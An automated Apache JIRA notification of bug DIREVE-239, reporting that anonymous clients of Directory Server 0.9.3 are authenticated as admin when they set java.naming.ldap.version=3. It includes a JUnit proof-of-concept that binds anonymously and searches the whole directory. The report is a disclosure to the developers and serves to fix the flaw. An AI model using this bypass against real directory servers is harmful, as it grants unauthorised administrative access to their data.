Anonymous user may gain access as admin user
--------------------------------------------
Key: DIREVE-239
URL: http://issues.apache.org/jira/browse/DIREVE-239
Project: Directory Server
Type: Bug
Versions: 0.9.3
Reporter: Endi S. Dewata
Assigned to: Alex Karasulu
Anonymous user may gain access as admin user by specifying
java.naming.ldap.version=3 in the JNDI client.
To show the problem, add a print statement in the AuthenticationService.java at
line 369:
// perform the authentication
LdapPrincipal authorizationId = authenticator.authenticate( ctx
);
System.out.println("Authorization ID: "+authorizationId);
Start the server, then run the following program:
import junit.framework.TestCase;
import javax.naming.Context;
import javax.naming.NamingEnumeration;
import javax.naming.directory.*;
import java.util.Hashtable;
public class Test extends TestCase {
public void testAnonymousBindWithLDAPVersion3() throws Exception {
String suffix = "dc=apache,dc=org";
Hashtable env = new Hashtable();
env.put(Context.INITIAL_CONTEXT_FACTORY,
"com.sun.jndi.ldap.LdapCtxFactory");
env.put(Context.PROVIDER_URL, "ldap://localhost:10389/");
// env.put("java.naming.ldap.version", "3");
DirContext ctx = new InitialDirContext(env);
SearchControls sc = new SearchControls();
sc.setSearchScope(SearchControls.SUBTREE_SCOPE);
NamingEnumeration ne = ctx.search(suffix, "(objectClass=*)", sc);
System.out.println("Search results:");
int counter = 0;
while (ne.hasMore()) {
SearchResult sr = (SearchResult)ne.next();
String rdn = sr.getName();
System.out.println(" - "+("".equals(rdn) ? suffix :
rdn+","+suffix));
counter++;
}
System.out.println("Found "+counter+" entries.");
ctx.close();
}
}
Without specifying java.naming.ldap.version=3, the user will remain anonymous
(empty Authentication ID). However, with java.naming.ldap.version=3, the
anonymous user gets authenticated as the admin user without even specifying any
password.
--
This message is automatically generated by JIRA.
-
If you think it was sent incorrectly contact one of the administrators:
http://issues.apache.org/jira/secure/Administrators.jspa
-
For more information on JIRA, see:
http://www.atlassian.com/software/jira